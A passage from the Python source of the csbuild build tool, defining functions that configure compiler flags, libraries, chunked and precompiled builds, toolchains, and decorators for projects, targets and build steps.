:type args: And arbitrary number of strings.
"""
projectSettings.currentProject.UnionSet( "assetCatalogs", _utils.OrderedSet( args ) )
def ClearLibraries( ):
"""Clears the list of libraries"""
projectSettings.currentProject.SetValue("libraries", _utils.OrderedSet())
def ClearStaticLibraries( ):
"""Clears the list of statically-linked libraries"""
projectSettings.currentProject.SetValue("staticLibraries", _utils.OrderedSet())
def ClearSharedibraries( ):
"""Clears the list of dynamically-linked libraries"""
projectSettings.currentProject.SetValue("sharedLibraries", _utils.OrderedSet())
def ClearFrameworks():
"""Clears the list of frameworks."""
projectSettings.currentProject.SetValue( "frameworks", _utils.OrderedSet() )
def ClearIncludeDirectories( ):
"""Clears the include directories"""
projectSettings.currentProject.SetValue( "includeDirsTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def ClearLibraryDirectories( ):
"""Clears the library directories"""
projectSettings.currentProject.SetValue( "libraryDirsTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def ClearFrameworkDirectories():
"""Clears the framework directories."""
projectSettings.currentProject.SetValue( "frameworkDirsTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def ClearAppleStoryboardFiles():
projectSettings.currentProject.SetValue( "storyboardFiles", _utils.OrderedSet() )
def ClearAppleInterfaceFiles():
projectSettings.currentProject.SetValue( "interfaceFiles", _utils.OrderedSet() )
def ClearAppleAssetCatalogs():
projectSettings.currentProject.SetValue( "assetCatalogs", _utils.OrderedSet() )
def SetOptimizationLevel( i ):
"""
Sets the optimization level. Due to toolchain differences, this should be called per-toolchain, usually.
:type i: OptimizationLevel
:param i: The level of optimization to use
"""
projectSettings.currentProject.SetValue("optLevel", i)
projectSettings.currentProject.SetValue("_optLevel_set", True)
def SetDebugLevel( i ):
"""
Sets the debug level. Due to toolchain differences, this should be called per-toolchain, usually.
:type i: DebugLevel
:param i: How (and if) symbols should be generated
"""
projectSettings.currentProject.SetValue("debugLevel", i)
projectSettings.currentProject.SetValue("_debugLevel_set", True)
def AddDefines( *args ):
"""
Add additionally defined preprocessor directives, as if each file had a #define directive at the very top.
:type args: an arbitrary number of strings
:param args: The list of preprocessor directives to define
"""
projectSettings.currentProject.ExtendList("defines", list( args ))
def ClearDefines( ):
"""Clear the list of defined preprocessor directives"""
projectSettings.currentProject.SetValue("defines", [])
def AddUndefines( *args ):
"""
Add explicitly undefined preprocessor directives, as if each file had a #undef directive at the very top.
:type args: an arbitrary number of strings
:param args: The list of preprocessor directives to undefine
"""
projectSettings.currentProject.ExtendList("undefines", list( args ))
def ClearUndefines( ):
"""Clear the list of undefined preprocessor directives"""
projectSettings.currentProject.SetValue("undefines", [])
def EnableHiddenVisibility():
"""
Enable the use of hidden symbol visibility. Ignored by all but the gcc toolchain (and derived toolchains).
"""
projectSettings.currentProject.SetValue( "useHiddenVisibility", True )
def SetCppStandardLibrary( s ):
"""
The standard C++ library to be used when compiling. Possible values are "libstdc++" and "libc++". Ignored by all but the gcc toolchain (and derived toolchains).
:param s: Library to use.
:type s: str
"""
projectSettings.currentProject.SetValue( "stdLib", s )
def SetCxxCommand( s ):
"""
Specify the compiler executable to be used for compiling C++ files. Ignored by all but the gcc toolchain (and derived toolchains).
:type s: str
:param s: Path to the executable to use for compilation
"""
projectSettings.currentProject.SetValue("cxx", s)
def SetCcCommand( s ):
"""
Specify the compiler executable to be used for compiling C files. Ignored by the msvc toolchain.
:type s: str
:param s: Path to the executable to use for compilation
"""
projectSettings.currentProject.SetValue("cc", s)
def SetOutput( name, projectType = ProjectType.Application ):
"""
Sets the output options for this project.
:type name: str
:param name: The output name. Do not include an extension, and do not include the "lib" prefix for libraries on
Linux. These are added automatically.
:type projectType: csbuild.ProjectType
:param projectType: The type of project to compile. The options are:
- ProjectType.Application - on Windows, this will be built with a .exe extension. On Linux, there is no extension.
- ProjectType.SharedLibrary - on Windows, this will generate a .lib and a .dll.
On Linux, this will generate a .so and prefix "lib" to the output name.
- ProjectType.StaticLibrary - on Windows, this will generate a .lib. On Linux, this will generate a .a and prefix
"lib" to the output name.
"""
projectSettings.currentProject.SetValue("outputName", name)
projectSettings.currentProject.SetValue("type", projectType)
def SetOutputExtension( name ):
"""
This allows you to override the extension used for the output file.
:type name: str
:param name: The desired extension, including the .; i.e., csbuild.Extension( ".exe" )
"""
projectSettings.currentProject.SetValue("ext", name)
def SetOutputDirectory( s ):
"""
Specifies the directory in which to place the output file.
:type s: str
:param s: The output directory, relative to the current script location, NOT to the project working directory.
"""
s = _utils.FixupRelativePath( s )
s = _utils.PathWorkingDirPair( s )
projectSettings.currentProject.SetValue( "outputDirTemp", s )
projectSettings.currentProject.SetValue( "_outputDir_set", True )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def SetIntermediateDirectory( s ):
"""
Specifies the directory in which to place the intermediate .o or .obj files.
:type s: str
:param s: The object directory, relative to the current script location, NOT to the project working directory.
"""
s = _utils.FixupRelativePath( s )
s = _utils.PathWorkingDirPair( s )
projectSettings.currentProject.SetValue( "objDirTemp", s )
projectSettings.currentProject.SetValue( "_objDir_set", True )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def EnableProfiling( ):
"""
Optimize output for profiling
"""
projectSettings.currentProject.SetValue("profile", True)
def DisableProfiling( ):
"""
Turns profiling optimizations back off
"""
projectSettings.currentProject.SetValue("profile", False)
def AddCxxCompilerFlags( *args ):
"""
Specifies a list of literal strings to be passed to the C++ compiler. As this is toolchain-specific, it should be
called on a per-toolchain basis.
:type args: an arbitrary number of strings
:param args: The list of flags to be passed
"""
projectSettings.currentProject.ExtendList("cxxCompilerFlags", list( args ))
def ClearCxxCompilerFlags( ):
"""
Clears the list of literal C++ compiler flags.
"""
projectSettings.currentProject.SetValue("cxxCompilerFlags", [])
def AddCcCompilerFlags( *args ):
"""
Specifies a list of literal strings to be passed to the C compiler. As this is toolchain-specific, it should be
called on a per-toolchain basis.
:type args: an arbitrary number of strings
:param args: The list of flags to be passed
"""
projectSettings.currentProject.ExtendList("ccCompilerFlags", list( args ))
def ClearCcCompilerFlags( ):
"""
Clears the list of literal C compiler flags.
"""
projectSettings.currentProject.SetValue("ccCompilerFlags", [])
def AddCompilerFlags( *args ):
"""
Specifies a list of literal strings to be passed to the both the C compiler and the C++ compiler.
As this is toolchain-specific, it should be called on a per-toolchain basis.
:type args: an arbitrary number of strings
:param args: The list of flags to be passed
"""
AddCcCompilerFlags( *args )
AddCxxCompilerFlags( *args )
def ClearCompilerFlags( ):
"""
Clears the list of literal compiler flags.
"""
ClearCcCompilerFlags( )
ClearCxxCompilerFlags( )
def AddLinkerFlags( *args ):
"""
Specifies a list of literal strings to be passed to the linker. As this is toolchain-specific, it should be
called on a per-toolchain basis.
:type args: an arbitrary number of strings
:param args: The list of flags to be passed
"""
projectSettings.currentProject.ExtendList("linkerFlags", list( args ))
def ClearLinkerFlags( ):
"""
Clears the list of literal linker flags.
"""
projectSettings.currentProject.SetValue("linkerFlags", [])
def DisableChunkedBuild( ):
"""Turn off the chunked/unity build system and build using individual files."""
projectSettings.currentProject.SetValue("useChunks", False)
def EnableChunkedBuild( ):
"""Turn chunked/unity build on and build using larger compilation units. This is the default."""
projectSettings.currentProject.SetValue("useChunks", True)
def StopOnFirstError():
"""
Stop compilation when the first error is encountered.
"""
_shared_globals.stopOnError = True
def SetNumFilesPerChunk( i ):
"""
Set the size of the chunks used in the chunked build. This indicates the number of files per compilation unit.
The default is 10.
This value is ignored if SetChunks is called.
Mutually exclusive with ChunkFilesize().
:type i: int
:param i: Number of files per chunk
"""
projectSettings.currentProject.SetValue("chunkSize", i)
projectSettings.currentProject.SetValue("chunkFilesize", 0)
def SetMaxChunkFileSize( i ):
"""
Sets the maximum combined filesize for a chunk. The default is 500000, and this is the default behavior.
This value is ignored if SetChunks is called.
Mutually exclusive with ChunkNumFiles()
:type i: int
:param i: Maximum size per chunk in bytes.
"""
projectSettings.currentProject.SetValue("chunkFilesize", i)
projectSettings.currentProject.SetValue("chunkSize", i)
def SetChunkTolerance( i ):
"""
Please see detailed description.
**If building using ChunkSize():**
Set the number of modified files below which a chunk will be split into individual files.
For example, if you set this to 3 (the default), then a chunk will be built as a chunk
if more than three of its files need to be built; if three or less need to be built, they will
be built individually to save build time.
**If building using ChunkFilesize():**
Sets the total combined filesize of modified files within a chunk below which the chunk will be split into
individual files.
For example, if you set this to 150000 (the default), then a chunk will be built as a chunk if the total
filesize of the files needing to be built exceeds 150kb. If less than 150kb worth of data needs to be built,
they will be built individually to save time.
:type i: int
:param i: Number of files required to trigger chunk building.
"""
if projectSettings.currentProject.chunkFilesize > 0:
projectSettings.currentProject.SetValue("chunkSizeTolerance", i)
elif projectSettings.currentProject.chunkSize > 0:
projectSettings.currentProject.SetValue("chunkTolerance", i)
else:
log.LOG_WARN( "Chunk size and chunk filesize are both zero or negative, cannot set a tolerance." )
def SetChunks( *chunks ):
"""
Explicitly set the chunks used as compilation units.
NOTE that setting this will disable the automatic file gathering, so any files in the project directory that
are not specified here will not be built.
:type chunks: an arbitrary number of lists of strings
:param chunks: Lists containing filenames of files to be built,
relativel to the script's location, NOT the project working directory. Each list will be built as one chunk.
"""
chunks = list( chunks )
projectSettings.currentProject.SetValue("forceChunks", chunks)
def ClearChunks( ):
"""Clears the explicitly set list of chunks and returns the behavior to the default."""
projectSettings.currentProject.SetValue("forceChunks", [])
def SetHeaderRecursionDepth( i ):
"""
Sets the depth to search for header files. If set to 0, it will search with unlimited recursion to find included
headers. Otherwise, it will travel to a depth of i to check headers. If set to 1, this will only check first-level
headers and not check headers included in other headers; if set to 2, this will check headers included in headers,
but not headers included by *those* headers; etc.
This is very useful if you're using a large library (such as boost) or a very large project and are experiencing
long waits prior to compilation.
:type i: int
:param i: Recursion depth for header examination
"""
projectSettings.currentProject.SetValue("headerRecursionDepth", i)
def IgnoreExternalHeaders( ):
"""
If this option is set, external headers will not be checked or followed when building. Only headers within the
base project's directory and its subdirectories will be checked. This will speed up header checking, but if you
modify any external headers, you will need to manually --clean or --rebuild the project.
"""
projectSettings.currentProject.SetValue("ignoreExternalHeaders", True)
def DisableWarnings( ):
"""
Disables all warnings.
"""
projectSettings.currentProject.SetValue("noWarnings", True)
def SetDefaultTarget( s ):
"""
Sets the default target if none is specified. The default value for this is release.
:type s: str
:param s: Name of the target to build for this project if none is specified.
"""
projectSettings.currentProject.SetValue("defaultTarget", s.lower( ))
def Precompile( *args ):
"""
Explicit list of header files to precompile. Disables chunk precompile when called.
:type args: an arbitrary number of strings
:param args: The files to precompile.
"""
projectSettings.currentProject.SetValue( "precompileTemp", [] )
newArgs = []
for arg in list( args ):
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "precompileTemp", newArgs )
projectSettings.currentProject.SetValue( "chunkedPrecompile", False )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def PrecompileAsC( *args ):
"""
Specifies header files that should be compiled as C headers instead of C++ headers.
:type args: an arbitrary number of strings
:param args: The files to specify as C files.
"""
projectSettings.currentProject.SetValue( "precompileAsCTemp", [] )
newArgs = []
for arg in list( args ):
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.AppendList( "precompileAsCTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def EnableChunkedPrecompile():
"""
When this is enabled, all header files will be precompiled into a single "superheader" and included in all files.
"""
projectSettings.currentProject.SetValue( "chunkedPrecompile", True )
def DisablePrecompile( *args ):
"""
Disables precompilation and handles headers as usual.
:type args: an arbitrary number of strings
:param args: A list of files to disable precompilation for.
If this list is empty, it will disable precompilation entirely.
"""
args = list( args )
if args:
newArgs = []
for arg in args:
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "precompileExcludeFilesTemp", newArgs )
else:
projectSettings.currentProject.SetValue( "chunkedPrecompile", False )
projectSettings.currentProject.SetValue( "precompileTemp", [] )
projectSettings.currentProject.SetValue( "precompileAsCTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def EnableUnityBuild( ):
"""
Turns on true unity builds, combining all files into only one compilation unit.
"""
projectSettings.currentProject.SetValue("unity", True)
def LinkStaticRuntime( ):
"""
Link against a static C/C++ runtime library.
"""
projectSettings.currentProject.SetValue("useStaticRuntime", True)
def LinkSharedRuntime( ):
"""
Link against a dynamic C/C++ runtime library.
"""
projectSettings.currentProject.SetValue("useStaticRuntime", False)
def SetOutputArchitecture( arch ):
"""
Set the output architecture.
:type arch: str
:param arch: The desired architecture. Choose from x86, x64, ARM.
"""
projectSettings.currentProject.SetValue("outputArchitecture", arch)
def AddExtraFiles( *args ):
"""
Adds additional files to be compiled that are not in the project directory.
:type args: an arbitrary number of strings
:param args: A list of files to add.
"""
newArgs = []
for arg in list( args ):
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "extraFilesTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def ClearExtraFiles():
"""
Clear the list of external files to compile.
"""
projectSettings.currentProject.SetValue( "extraFilesTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddExtraDirectories( *args ):
"""
Adds additional directories to search for files in.
:type args: an arbitrary number of strings
:param args: A list of directories to search.
"""
newArgs = []
for arg in list( args ):
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "extraDirsTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def ClearExtraDirectories():
"""
Clear the list of external directories to search.
"""
projectSettings.currentProject.SetValue( "extraDirsTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def AddExtraObjects( *args ):
"""
Adds additional objects to be passed to the linker that are not in the project directory.
:type args: an arbitrary number of strings
:param args: A list of objects to add.
"""
newArgs = []
for arg in list( args ):
arg = _utils.FixupRelativePath( arg )
arg = _utils.PathWorkingDirPair( arg )
newArgs.append( arg )
projectSettings.currentProject.ExtendList( "extraObjsTemp", newArgs )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def ClearExtraObjects():
"""
Clear the list of external objects to link.
"""
projectSettings.currentProject.SetValue( "extraObjsTemp", [] )
projectSettings.currentProject.SetValue( "tempsDirty", True )
def EnableWarningsAsErrors( ):
"""
Promote all warnings to errors.
"""
projectSettings.currentProject.SetValue("warningsAsErrors", True)
def DisableWarningsAsErrors( ):
"""
Disable the promotion of warnings to errors.
"""
projectSettings.currentProject.SetValue("warningsAsErrors", False)
def DoNotChunkTogether(pattern, *additionalPatterns):
"""
Makes files matching the given patterns mutually exclusive for chunking.
I.e., if you call this with DoNotChunkTogether("File1.cpp", "File2.cpp"), it guarantees
File1 and File2 will never appear together in the same chunk. If you specify more than two files,
or a pattern that matches more than two files, no two files in the list will ever appear together.
.. note:
This setting is not eligible for scope inheritance.
:type pattern: string
:param pattern: Pattern to search for files with (i.e., Source/*_Unchunkable.cpp)
:type additionalPatterns: arbitrary number of optional strings
:param additionalPatterns: Additional patterns to compile the list of mutually exclusive files with
"""
patterns = [pattern] + list(additionalPatterns)
mutexFiles = _utils.OrderedSet()
for patternToMatch in patterns:
for filename in glob.glob(patternToMatch):
mutexFiles.add(os.path.abspath(filename))
for file1 in mutexFiles:
for file2 in mutexFiles:
if file1 == file2:
continue
if file1 not in projectSettings.currentProject.chunkMutexes:
projectSettings.currentProject.chunkMutexes[file1] = _utils.OrderedSet({ file2 })
else:
projectSettings.currentProject.chunkMutexes[file1].add(file2)
def DoNotChunk(*files):
"""
Prevents the listed files (or files matching the listed patterns) from ever being placed
in a chunk, ever.
:type files: arbitrary number of strings
:param files: filenames or patterns to exclude from chunking
"""
for pattern in list(files):
for filename in glob.glob(pattern):
projectSettings.currentProject.AddToSet("chunkExcludes", os.path.abspath(filename))
def SetStaticLinkMode(mode):
"""
Determines how static links are handled. With the msvc toolchain, iterative link times of a project with many libraries
can be significantly improved by setting this to :StaticLinkMode.LinkLibs:. This will cause the linker to link
the .obj files used to make a library directly into the dependent project. Link times for full builds may be slightly slower,
but this will allow incremental linking to function when libraries are being changed. (Usually, changing a .lib results
in a full link.)
On most toolchains, this defaults to :StaticLinkMode.LinkLibs:. In debug mode only for the msvc toolchain, this defaults
to :StaticLinkMode.LinkIntermediateObjects:.
:type mode: :StaticLinkMode:
:param mode: The link mode to set
"""
projectSettings.currentProject.SetValue("linkMode", mode)
projectSettings.currentProject.SetValue("linkModeSet", True)
def SetUserData(key, value):
"""
Adds miscellaneous data to a project. This can be used later in a build event or in a format string.
This becomes an attribute on the project's userData member variable. As an example, to set a value:
csbuild.SetUserData("someData", "someValue")
Then to access it later:
project.userData.someData
.. note:
This setting is not eligible for scope inheritance.
:type key: str
:param key: name of the variable to set
:type value: any
:param value: value to set to that variable
"""
projectSettings.currentProject.userData.dataDict[key] = value
def SetApplePropertyList( plistFile ):
"""
Set the property list for a project. This only applies to builds on Apple platforms.
:param plistFile:
:type plistFile: :class:`csbuild.plugin_plist_generator.PListGenerator`
"""
projectSettings.currentProject.SetValue( "plistFile", copy.deepcopy( plistFile ) )
def SetSupportedArchitectures(*architectures):
"""
Specifies the architectures that this project supports. This can be used to limit
--all-architectures from building everything supported by the toolchain, if the project
is not set up to support all of the toolchain's architectures.
"""
projectSettings.currentProject.SetValue("supportedArchitectures", _utils.OrderedSet(architectures))
def SetSupportedToolchains(*toolchains):
"""
Specifies the toolchains that this project supports. This can be used to limit
--all-toolchains from building everything supported by csbuild, if the project
is not set up to support all of the toolchains.
"""
projectSettings.currentProject.SetValue("supportedToolchains", _utils.OrderedSet(toolchains))
def RegisterToolchain( name, compiler, linker, **customTools ):
"""
Register a new toolchain for use in the project.
:type name: str
:param name: The name of the toolchain being registered
:type compiler: class derived from :class:`csbuild.toolchain.compilerBase`
:param compiler: The compiler used in this toolchain
:type linker: class derived from :class:`csbuild.toolchain.linkerBase`
:param linker: The linker used in this toolchain
"""
class registeredToolchain(toolchain.toolchain):
def __init__(self):
toolchain.toolchain.__init__(self)
self.tools["compiler"] = compiler(self.shared)
self.tools["linker"] = linker(self.shared)
toolsDict = dict(customTools)
for name, tool in toolsDict.items():
self.tools[name] = tool(self.shared)
# Format the name so that it can be used as part of its architecture command line option.
# This generally means replacing all whitespace with dashes.
toolchainArchString = name
toolchainArchString = toolchainArchString.replace(" ", "-")
toolchainArchString = toolchainArchString.replace(",", "-")
toolchainArchString = toolchainArchString.replace("\t", "-")
toolchainArchString = toolchainArchString.replace("\r", "") # Intentionally remove '\r'.
toolchainArchString = toolchainArchString.replace("\n", "-")
# Don't know how often it will occur, but if any quotes happen to be in the string, remove them.
toolchainArchString = toolchainArchString.replace('"', "")
toolchainArchString = toolchainArchString.replace("'", "")
toolchainArchString = toolchainArchString.strip("-") # Remove any dashes at the start and end of the string.
_shared_globals.alltoolchains[name] = registeredToolchain
_shared_globals.allToolchainArchStrings[name] = (toolchainArchString + "-architecture", toolchainArchString + "-arch")
projectSettings.currentProject.toolchains.update( { name : registeredToolchain() } )
projectSettings.currentProject.intermediateToolchains.update( { name : registeredToolchain() } )
projectSettings.currentProject.finalToolchains.update( { name : registeredToolchain() } )
def RegisterProjectGenerator( name, generator ):
"""
Register a new project generator for use in solution generation.
:type name: str
:param name: The name of the generator being registered
:type generator: csbuild.project_generator.project_generator
:param generator: The generator to associate with that name
"""
_shared_globals.allgenerators[name] = generator
_shared_globals.project_generators[name] = generator
def RegisterPlugin( pluginClass ):
projectSettings.currentProject.AddToSet( "plugins", pluginClass )
def Toolchain( *args ):
"""
Perform actions on the listed toolchains. Examples:
csbuild.Toolchain("gcc").NoPrecompile()
csbuild.Toolchain("gcc", "msvc").EnableWarningsAsErrors()
:type args: arbitrary number of strings
:param args: The list of toolchains to act on
:return: A proxy object that enables functions to be applied to one or more specific toolchains.
"""
toolchains = []
for arg in list( args ):
scope = projectSettings.currentProject._currentScope
if scope & ScopeDef.Self:
toolchains.append( projectSettings.currentProject.toolchains[arg] )
if scope & ScopeDef.Intermediate:
toolchains.append( projectSettings.currentProject.intermediateToolchains[arg] )
if scope & ScopeDef.Final:
toolchains.append( projectSettings.currentProject.finalToolchains[arg] )
return toolchain.ClassCombiner( toolchains )
def SetActiveToolchain( name ):
"""
Sets the active toolchain to be used when building the project.
On Windows platforms, this is set to msvc by default.
On Linux platforms, this is set to gcc by default.
This will be overridden if the script is executed with the --toolchain option.
:type name: str
:param name: The toolchain to use to build the project
"""
_shared_globals.selectedToolchains.add(name)
projectSettings.currentProject.SetValue("activeToolchainName", name)
#</editor-fold>
#<editor-fold desc="decorators">
scriptFiles = []
class Link(object):
def __init__(self, libName, scope = ScopeDef.Final, includeToolchains=None, includeArchitectures=None, excludeToolchains=None, excludeArchitectures=None):
self.libName = libName
self.scope = scope
self.includeToolchains = includeToolchains
self.includeArchitectures = includeArchitectures
self.excludeToolchains = excludeToolchains
self.excludeArchitectures = excludeArchitectures
class Src(object):
def __init__(self, libName, scope = ScopeDef.Final, includeToolchains=None, includeArchitectures=None, excludeToolchains=None, excludeArchitectures=None):
self.libName = libName
self.scope = scope
self.includeToolchains = includeToolchains
self.includeArchitectures = includeArchitectures
self.excludeToolchains = excludeToolchains
self.excludeArchitectures = excludeArchitectures
def scope( scope ):
def wrap( func ):
oldScope = projectSettings.currentProject._currentScope
projectSettings.currentProject._currentScope = scope
func()
projectSettings.currentProject._currentScope = oldScope
return wrap
def _project_decorator( name, workingDirectory, depends = None, priority = -1, ignoreDependencyOrdering = False, autoDiscoverSourceFiles = True, prebuilt = False, shell = False ):
if not depends:
depends = []
if isinstance( depends, str ):
depends = [depends]
def wrap( projectFunction ):
if name in _shared_globals.tempprojects:
log.LOG_ERROR( "Multiple projects with the same name: {}. Ignoring.".format( name ) )
return
previousProject = projectSettings.currentProject.copy( )
projectFunction( )
newProject = projectSettings.currentProject.copy( )
newProject.key = name
newProject.name = name
newProject.workingDirectory = os.path.abspath( workingDirectory )
newProject.scriptPath = os.getcwd( )
newProject.scriptFile = scriptFiles[-1]
newProject.libDepends = []
newProject.libDependsIntermediate = []
newProject.libDependsFinal = []
newProject.srcDepends = []
newProject.srcDependsIntermediate = []
newProject.srcDependsFinal = []
newProject.autoDiscoverSourceFiles = autoDiscoverSourceFiles
newProject.prebuilt = prebuilt
newProject.shell = shell
for depend in depends:
if isinstance(depend, str):
depend = Link(depend)
if isinstance(depend, Link):
if depend.scope & ScopeDef.Self:
newProject.linkDepends.append(depend)
if depend.scope & ScopeDef.Intermediate:
newProject.linkDependsIntermediate.append(depend)
if depend.scope & ScopeDef.Final:
newProject.linkDependsFinal.append(depend)
elif isinstance(depend, Src):
if depend.scope & ScopeDef.Self:
newProject.srcDepends.append(depend)
if depend.scope & ScopeDef.Intermediate:
newProject.srcDependsIntermediate.append(depend)
if depend.scope & ScopeDef.Final:
newProject.srcDependsFinal.append(depend)
newProject.func = projectFunction
newProject.priority = priority
newProject.ignoreDependencyOrdering = ignoreDependencyOrdering
_shared_globals.tempprojects.update( { name: newProject } )
projectSettings.currentGroup.tempprojects.update( { name: newProject } )
newProject.parentGroup = projectSettings.currentGroup
projectSettings.currentProject = previousProject
return projectFunction
return wrap
def project( name, workingDirectory, depends = None, priority = -1, ignoreDependencyOrdering = False, autoDiscoverSourceFiles = True ):
"""
Decorator used to declare a project. linkDepends and srcDepends here will be used to determine project build order.
:type name: str
:param name: A unique name to be used to refer to this project
:type workingDirectory: str
:param workingDirectory: The directory in which to perform build operations. This directory
(or a subdirectory) should contain the project's source files.
:type depends: list
:param linkDepends: A list of other projects. This project will not be linked until the dependent projects
have completed their build process. These can be specified as either projName, Link(projName, scope), or Src(projName, scope).
projName will be converted to Link(projName, ScopeDef.Final)
Link will cause the project it applies to to link this dependency.
Src will cause the project it applies to to wait until this project finishes before it starts its build at all.
"""
return _project_decorator(name, workingDirectory, depends, priority, ignoreDependencyOrdering, autoDiscoverSourceFiles)
def prebuilt( name, depends = None ):
return _project_decorator(name, "", depends, prebuilt = True)
def shellProject( name, workingDirectory, depends = None, autoDiscoverSourceFiles = True ):
return _project_decorator(name, workingDirectory, depends, autoDiscoverSourceFiles = autoDiscoverSourceFiles, shell = True)
def projectGroup( name ):
"""
Specifies a grouping of projects. This will add scope to the global project settings, and will additionally be used
in solution generation to group the projects.
:type name: str
:param name: The name to identify this project group
"""
def wrap( groupFunction ):
if name in projectSettings.currentGroup.subgroups:
projectSettings.currentGroup = projectSettings.currentGroup.subgroups[name]
else:
newGroup = projectSettings.ProjectGroup( name, projectSettings.currentGroup )
projectSettings.currentGroup.subgroups.update( { name: newGroup } )
projectSettings.currentGroup = newGroup
previousProject = projectSettings.currentProject.copy( )
groupFunction( )
projectSettings.currentProject = previousProject
projectSettings.currentGroup = projectSettings.currentGroup.parentGroup
return wrap
def target( name, override = False ):
"""
Specifies settings for a target. If the target doesn't exist it will be implicitly created. If a target does exist
with this name, this function will be appended to a list of functions to be run for that target name, unless
override is True.
:type name: str
:param name: The name for the target; i.e., "debug", "release"
:type override: bool
:param override: If this is true, existing functionality for this target will be discarded for this project.
"""
def wrap( targetFunction ):
if override is True or name not in projectSettings.currentProject.targets:
projectSettings.currentProject.targets.update( { name: [targetFunction] } )
else:
projectSettings.currentProject.targets[name].append( targetFunction )
return targetFunction
_shared_globals.alltargets.add( name )
return wrap
def fileSettings( files, override = False ):
"""
Specifies settings that affect a single specific file
:type files: str or list[str]
:param files: The file or files to apply these settings to
:type override: bool
:param override: If this is true, existing functionality for this target will be discarded for this project.
"""
def wrap( fileFunction ):
fileList = files
if not isinstance(fileList, list):
fileList = [fileList]
for file in fileList:
file = os.path.normcase(os.path.abspath(file))
if override is True or file not in projectSettings.currentProject.fileOverrides:
projectSettings.currentProject.fileOverrides.update( { file: [fileFunction] } )
else:
projectSettings.currentProject.fileOverrides[file].append( fileFunction )
return fileFunction
return wrap
def architecture( archs, override = False ):
"""
Specifies settings for a specific list of architectures.
"""
def wrap( archFunction ):
archList = archs
if not isinstance(archList, list):
archList = [archList]
for arch in archList:
if override is True or arch not in projectSettings.currentProject.archFuncs:
projectSettings.currentProject.archFuncs.update( { arch: [archFunction] } )
else:
projectSettings.currentProject.archFuncs[arch].append( archFunction )
return archFunction
return wrap
def prePrepareBuildStep( func ):
"""
Decorator that creates a pre-build step for the containing project. Pre-PrepareBuild steps run just before the project
begins preparing its build tasks.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("prePrepareBuildSteps", func)
return func
def postPrepareBuildStep( func ):
"""
Decorator that creates a post-compile step for the containing project. Post-PrepareBuild steps run just after the
project completes its build preparation. This is the only place where running project.RediscoverFiles() has any
appreciable effect.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("postPrepareBuildSteps", func)
return func
def preMakeStep( func ):
"""
Decorator that creates a pre-make step for the containing project. Pre-make steps run after all projects' preparation
steps have completed and their final chunk sets have been collected, but before any compiling starts.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("preMakeSteps", func)
return func
def postMakeStep( func ):
"""
Decorator that creates a post-make step for the containing project. Post-make steps run after all projects have
finished building and linking. This step will only run if the entire build process was successful.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("postMakeSteps", func)
return func
def preBuildStep( func ):
"""
Decorator that creates a pre-build step for the containing project. Pre-build steps run just before the project
begins compiling.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("preBuildSteps", func)
return func
def postBuildStep( func ):
"""
Decorator that creates a post-build step for the containing project. Post-build steps run after the project has
**successfully** compiled **and** linked.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("postBuildSteps", func)
return func
def preLinkStep( func ):
"""
Decorator that creates a pre-link step for the containing project. Pre-link steps run after a successful compile of
the project, but before the project links.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take a single argument, which will be of type
:class:`csbuild.projectSettings.projectSettings`.
"""
projectSettings.currentProject.AddToSet("preLinkSteps", func)
return func
def globalPostMakeStep( func ):
"""
Decorator that creates a global post-make step that will only be executed once. Post-make steps run after all projects have
finished building and linking. This step will only run if the entire build process was successful.
Global build steps execute after all project build steps of the same type have completed.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take no arguments.
"""
_shared_globals.globalPostMakeSteps.add(func)
return func
def globalPreMakeStep( func ):
"""
Decorator that creates a global pre-make step that will only be executed once. Pre-make steps run after all projects' preparation
steps have completed and their final chunk sets have been collected, but before any compiling starts.
Global build steps execute after all project build steps of the same type have completed.
:param func: (Implicit) The function wrapped by this decorator
:type func: (Implicit) function
.. note:: The function this wraps should take no arguments.
"""
_shared_globals.globalPreMakeSteps.add(func)
